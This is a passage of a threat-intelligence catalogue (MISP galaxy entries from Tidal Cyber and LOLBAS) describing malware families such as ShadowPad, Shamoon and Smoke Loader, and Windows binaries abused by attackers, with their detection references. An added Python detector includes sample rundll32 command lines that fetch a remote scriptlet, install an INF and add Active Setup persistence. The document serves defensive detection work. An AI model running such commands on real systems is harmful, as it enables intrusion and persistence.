Detection: * Sigma: [proc_creation_win_lolbin_setres.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml) * IOC: Unusual location for choice.exe file * IOC: Process created from choice.com binary * IOC: Existence of choice.cmd file<sup>[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]</sup>

The tag is: misp-galaxy:software="Setres"

SettingSyncHost.exe - Associated Software

<sup>[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]</sup>

The tag is: misp-galaxy:software="SettingSyncHost.exe - Associated Software"

SettingSyncHost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Host Process for Setting Synchronization

Author: Elliot Killick

Paths: * C:\Windows\System32\SettingSyncHost.exe * C:\Windows\SysWOW64\SettingSyncHost.exe

Detection: * Sigma: [proc_creation_win_lolbin_settingsynchost.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml) * IOC: SettingSyncHost.exe should not be run on a normal workstation<sup>[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]</sup>

The tag is: misp-galaxy:software="SettingSyncHost"

Setupapi.dll - Associated Software

<sup>[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]</sup>

The tag is: misp-galaxy:software="Setupapi.dll - Associated Software"

Setupapi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Setup Application Programming Interface

Author: LOLBAS Team

Paths: * c:\windows\system32\setupapi.dll * c:\windows\syswow64\setupapi.dll

Detection: * Sigma: [proc_creation_win_rundll32_setupapi_installhinfsection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml) * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: detect_rundll32_application_control_bypass_setupapi.yml<sup>[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]</sup>

The tag is: misp-galaxy:software="Setupapi"
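
Several LOLBAS entries in this section share the same detection surface: the Rundll32 entry lists outbound network connections from rundll32 and flags such as -sta, the Scrobj entry lists rundll32 invoking GenerateTypeLib with a protocol handler on the command line, the Setupapi entry lists rundll32 calling InstallHinfSection, and the Runonce entry lists additions under the Active Setup Installed Components key. The following is an added example, not code from LOLBAS, Sigma or this galaxy, that turns those IOCs into checks run over Sysmon-style events. The events, paths, CLSID and addresses are constructed for the illustration; field names follow Sysmon EventID 1 (process create), 3 (network connect) and 13 (registry value set), with the Initiated field stored as a Python bool here.

```python
"""Added example (not LOLBAS or MISP code): the rundll32, scrobj.dll, setupapi.dll
and runonce IOCs from this section, applied to constructed Sysmon-style events."""
from __future__ import annotations

import ipaddress
import re

# Command-line IOCs from the Rundll32, Scrobj.dll and Setupapi.dll entries.
CMDLINE_RULES = {
    "rundll32_sta_flag": lambda cl: re.search(r"(?:^|\s)-sta(?:\s|$)", cl) is not None,
    "scrobj_generatetypelib_url": lambda cl: "generatetypelib" in cl and "://" in cl,
    "setupapi_installhinfsection": lambda cl: "setupapi" in cl and "installhinfsection" in cl,
}
# Runonce entry: a new Active Setup component key is the persistence IOC.
ACTIVE_SETUP = "\\active setup\\installed components\\"


def is_rundll32(image: str) -> bool:
    return image.replace("/", "\\").lower().endswith("\\rundll32.exe")


def check_process(ev: dict) -> list[str]:
    if not is_rundll32(ev.get("Image", "")):
        return []
    cl = ev.get("CommandLine", "").lower()
    return [name for name, match in CMDLINE_RULES.items() if match(cl)]


def check_network(ev: dict) -> list[str]:
    """Any connection initiated by rundll32 to something other than loopback
    matches the Rundll32 entry's network IOC."""
    if not is_rundll32(ev.get("Image", "")) or not ev.get("Initiated", True):
        return []
    if ipaddress.ip_address(ev["DestinationIp"]).is_loopback:
        return []
    return ["rundll32_outbound_connection"]


def check_registry(ev: dict) -> list[str]:
    if ev.get("EventType") == "SetValue" and ACTIVE_SETUP in ev.get("TargetObject", "").lower():
        return ["active_setup_component_added"]
    return []


CHECKERS = {1: check_process, 3: check_network, 13: check_registry}


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every IOC hit, in event order."""
    hits: list[tuple[int, str]] = []
    for i, ev in enumerate(events):
        checker = CHECKERS.get(ev.get("EventID"))
        if checker:
            hits.extend((i, name) for name in checker(ev))
    return hits


# Constructed sample telemetry; addresses come from documentation ranges.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},          # benign
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe -sta {00000000-0000-0000-0000-000000000001}"},   # hypothetical CLSID
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://192.0.2.10/x.sct"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Users\Public\x.inf"},
    {"EventID": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "Initiated": True, "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "Initiated": True, "DestinationIp": "127.0.0.1", "DestinationPort": 8080},    # loopback, ignored
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{evil}\StubPath"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The command-line rules are deliberately substring matches on the lowercased line, which is what the LOLBAS IOC wording supports; a production rule would also whitelist known-good rundll32 callers such as Control Panel applets, as the benign first event shows why.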

POISONPLUG.SHADOW - Associated Software

The tag is: misp-galaxy:software="POISONPLUG.SHADOW - Associated Software"

ShadowPad

[ShadowPad](https://app.tidalcyber.com/software/5190f50d-7e54-410a-9961-79ab751ddbab) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), but has since been observed to be used by various Chinese threat activity groups. <sup>[[Recorded Future RedEcho Feb 2021](https://app.tidalcyber.com/references/6da7eb8a-aab4-41ea-a0b7-5313d88cbe91)]</sup><sup>[[Securelist ShadowPad Aug 2017](https://app.tidalcyber.com/references/862877d7-e18c-4613-bdad-0700bf3d45ae)]</sup><sup>[[Kaspersky ShadowPad Aug 2017](https://app.tidalcyber.com/references/95c9a28d-6056-4f87-9a46-9491318889e2)]</sup>

The tag is: misp-galaxy:software="ShadowPad"

Disttrack - Associated Software

The tag is: misp-galaxy:software="Disttrack - Associated Software"

Shamoon

[Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) has also been seen leveraging [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.<sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup>

The tag is: misp-galaxy:software="Shamoon"

Shark

[Shark](https://app.tidalcyber.com/software/278da5e8-4d4c-4c45-ad72-8f078872fb4a) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd); it has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least July 2021.<sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup><sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:software="Shark"

SharpChromium

SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."<sup>[[GitHub SharpChromium](/references/ca1956a5-72f2-43ad-a17f-a52ca97bd84e)]</sup>

The tag is: misp-galaxy:software="SharpChromium"

SharpDisco

[SharpDisco](https://app.tidalcyber.com/software/4ed1e83b-a208-5518-bed2-d07c1b289da2) is a dropper developed in C# that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 to load malicious plugins.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="SharpDisco"

SharpRoast

SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.<sup>[[GitHub SharpRoast](/references/43a2e05d-4662-4a5c-9c99-3165f0d71169)]</sup>

The tag is: misp-galaxy:software="SharpRoast"

SharpShares

SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="SharpShares"

SharpStage

[SharpStage](https://app.tidalcyber.com/software/564643fd-7113-490e-9f6a-f0cc3f0e1a4c) is a .NET malware with backdoor capabilities.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup><sup>[[BleepingComputer Molerats Dec 2020](https://app.tidalcyber.com/references/307108c8-9c72-4f31-925b-0b9bd4b31e7b)]</sup>

The tag is: misp-galaxy:software="SharpStage"

SHARPSTATS

The tag is: misp-galaxy:software="SHARPSTATS"

Shdocvw.dll - Associated Software

<sup>[[Shdocvw.dll - LOLBAS Project](/references/0739d5fe-b460-4ed4-be75-cff422643a32)]</sup>

The tag is: misp-galaxy:software="Shdocvw.dll - Associated Software"

Shell32.dll - Associated Software

<sup>[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]</sup>

The tag is: misp-galaxy:software="Shell32.dll - Associated Software"

Shell32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Shell Common Dll

Author: LOLBAS Team

Paths:
* c:\windows\system32\shell32.dll
* c:\windows\syswow64\shell32.dll

Detection:
* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)
* Splunk: rundll32_control_rundll_hunt.yml<sup>[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]</sup>

The tag is: misp-galaxy:software="Shell32"

Shimgvw.dll - Associated Software

<sup>[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]</sup>

The tag is: misp-galaxy:software="Shimgvw.dll - Associated Software"

Shimgvw

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Photo Gallery Viewer

Author: Eral4m

Paths:
* c:\windows\system32\shimgvw.dll
* c:\windows\syswow64\shimgvw.dll

Detection:
* IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line<sup>[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]</sup>

The tag is: misp-galaxy:software="Shimgvw"

ShimRat

[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7) has been used by the suspected China-based adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)" comes from the malware’s extensive use of Windows Application Shimming to maintain persistence. <sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:software="ShimRat"

ShimRatReporter

[ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) is a tool used by suspected Chinese adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)) as well as set up faux infrastructure which mimics the adversary’s targets. [ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.<sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:software="ShimRatReporter"

SHIPSHAPE

[SHIPSHAPE](https://app.tidalcyber.com/software/3db0b464-ec5d-4cdd-86c2-62eac9c8acd6) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="SHIPSHAPE"

Backdoor.APT.CookieCutter - Associated Software

The tag is: misp-galaxy:software="Backdoor.APT.CookieCutter - Associated Software"

Pirpi - Associated Software

The tag is: misp-galaxy:software="Pirpi - Associated Software"

Sibot

[Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) variants in early 2021 during its investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) and the SolarWinds Compromise.<sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup>

The tag is: misp-galaxy:software="Sibot"

SideTwist

The tag is: misp-galaxy:software="SideTwist"

SILENTTRINITY

[SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in PowerShell, C, and Boo. [SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.<sup>[[GitHub SILENTTRINITY March 2022](https://app.tidalcyber.com/references/cff66280-c592-4e3c-a56c-32a9620cf95c)]</sup><sup>[[Security Affairs SILENTTRINITY July 2019](https://app.tidalcyber.com/references/b4945fc0-b89b-445c-abfb-14959deba3d0)]</sup>

The tag is: misp-galaxy:software="SILENTTRINITY"

Siloscape

[Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) was first observed in March 2021.<sup>[[Unit 42 Siloscape Jun 2021](https://app.tidalcyber.com/references/4be128a7-97b8-48fa-8a52-a53c1e56f086)]</sup>

The tag is: misp-galaxy:software="Siloscape"

Skeleton Key

[Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. <sup>[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]</sup> Functionality similar to [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is included as a module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).

The tag is: misp-galaxy:software="Skeleton Key"

Skidmap

[Skidmap](https://app.tidalcyber.com/software/cc91d3d4-bbf5-4a9c-b43a-2ba034db4858) is a kernel-mode rootkit used for cryptocurrency mining.<sup>[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]</sup>

The tag is: misp-galaxy:software="Skidmap"

Sliver

[Sliver](https://app.tidalcyber.com/software/bbd16b7b-7e35-4a11-86ff-9b19e17bdab3) is an open source, cross-platform, red team command and control framework written in Golang.<sup>[[Bishop Fox Sliver Framework August 2019](https://app.tidalcyber.com/references/51e67e37-2d61-4228-999b-bec6f80cf106)]</sup>

The tag is: misp-galaxy:software="Sliver"

JackOfHearts - Associated Software

Kaspersky Labs refers to the "mediaplayer.exe" dropper within [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) as the JackOfHearts.<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

The tag is: misp-galaxy:software="JackOfHearts - Associated Software"

QueenOfClubs - Associated Software

Kaspersky Labs assesses [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is an older variant of a malware family it refers to as the QueenOfClubs.<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

The tag is: misp-galaxy:software="QueenOfClubs - Associated Software"

SLOTHFULMEDIA

[SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.<sup>[[CISA MAR SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/57c3256c-0d24-4647-9037-fefe1c88ad61)]</sup><sup>[[Costin Raiu IAmTheKing October 2020](https://app.tidalcyber.com/references/2be88843-ed3a-460e-87c1-85aa50e827c8)]</sup> It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.<sup>[[USCYBERCOM SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/600de668-f128-4368-8667-24ed9a9db47a)]</sup><sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is part of an activity cluster it refers to as "IAmTheKing".<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup> ESET also noted code similarity between [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) and droppers used by a group it refers to as "PowerPool".<sup>[[ESET PowerPool Code October 2020](https://app.tidalcyber.com/references/d583b409-35bd-45ea-8f2a-c0d566a6865b)]</sup>

The tag is: misp-galaxy:software="SLOTHFULMEDIA"

SLOWDRIFT

The tag is: misp-galaxy:software="SLOWDRIFT"

GRAMDOOR - Associated Software

The tag is: misp-galaxy:software="GRAMDOOR - Associated Software"

Small Sieve

[Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[NCSC GCHQ Small Sieve Jan 2022](https://app.tidalcyber.com/references/0edb8946-be38-45f5-a27c-bdbebc383d72)]</sup>

Security researchers have also noted [Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948)'s use by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).<sup>[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]</sup>

The tag is: misp-galaxy:software="Small Sieve"

SMOKEDHAM

[SMOKEDHAM](https://app.tidalcyber.com/software/9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3) is a PowerShell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.<sup>[[FireEye Shining A Light on DARKSIDE May 2021](https://app.tidalcyber.com/references/6ac6acc2-9fea-4887-99b2-9988991b47b6)]</sup><sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup>

The tag is: misp-galaxy:software="SMOKEDHAM"

Dofoil - Associated Software

The tag is: misp-galaxy:software="Dofoil - Associated Software"

Smoke Loader

[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. <sup>[[Malwarebytes SmokeLoader 2016](https://app.tidalcyber.com/references/b619e338-16aa-478c-b227-b22f78d572a3)]</sup> <sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup>

The tag is: misp-galaxy:software="Smoke Loader"

Snip3

The tag is: misp-galaxy:software="Snip3"

SNUGRIDE

The tag is: misp-galaxy:software="SNUGRIDE"

Socksbot

[Socksbot](https://app.tidalcyber.com/software/c1906bb6-0b5b-4916-8b29-37f7e272f6b3) is a backdoor that abuses Socket Secure (SOCKS) proxies. <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="Socksbot"

DARKTOWN - Associated Software

The tag is: misp-galaxy:software="DARKTOWN - Associated Software"

DelfsCake - Associated Software

The tag is: misp-galaxy:software="DelfsCake - Associated Software"

dfls - Associated Software

The tag is: misp-galaxy:software="dfls - Associated Software"

SodaMaster

[SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.<sup>[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]</sup>

The tag is: misp-galaxy:software="SodaMaster"

SoftPerfect Network Scanner

SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="SoftPerfect Network Scanner"

SombRAT

[SombRAT](https://app.tidalcyber.com/software/0ec24158-d5d7-4d2e-b5a5-bc862328a317) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) ransomware.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup><sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

The tag is: misp-galaxy:software="SombRAT"

SoreFang

The tag is: misp-galaxy:software="SoreFang"

SPACESHIP

[SPACESHIP](https://app.tidalcyber.com/software/0f8d0a73-9cd3-475a-b31b-d457278c921a) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="SPACESHIP"

Spark

[Spark](https://app.tidalcyber.com/software/93f8c180-6794-4e9c-b716-6b31f42eb72d) is a Windows backdoor and has been in use since as early as 2017.<sup>[[Unit42 Molerat Mar 2020](https://app.tidalcyber.com/references/328f1c87-c9dc-42d8-bb33-a17ad4d7f57e)]</sup>

The tag is: misp-galaxy:software="Spark"

SpeakUp

[SpeakUp](https://app.tidalcyber.com/software/b9b67878-4eb1-4a0b-9b36-a798881ed566) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. <sup>[[CheckPoint SpeakUp Feb 2019](https://app.tidalcyber.com/references/8f0d6a8d-6bd4-4df5-aa28-70e1ec4b0b12)]</sup>

The tag is: misp-galaxy:software="SpeakUp"

Sphynx

Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.<sup>[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)]</sup> Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.<sup>[[Microsoft Threat Intelligence Tweet August 17 2023](/references/8b0ebcb5-d531-4f49-aa2d-bceb5e491b3f)]</sup>

The tag is: misp-galaxy:software="Sphynx"

SpicyOmelette

[SpicyOmelette](https://app.tidalcyber.com/software/2be9e22d-0af8-46f5-b30e-b3712ccf716d) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) since at least 2018.<sup>[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]</sup>

The tag is: misp-galaxy:software="SpicyOmelette"

Splashtop Streamer - Associated Software

The tag is: misp-galaxy:software="Splashtop Streamer - Associated Software"

Splashtop

Splashtop is a tool used to enable remote connections to network devices for support and administration.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Splashtop"

spwebmember

[spwebmember](https://app.tidalcyber.com/software/0fdabff3-d996-493c-af67-f3ac02e4b00b) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. <sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:software="spwebmember"

Sqldumper.exe - Associated Software

<sup>[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]</sup>

The tag is: misp-galaxy:software="Sqldumper.exe - Associated Software"

Sqldumper

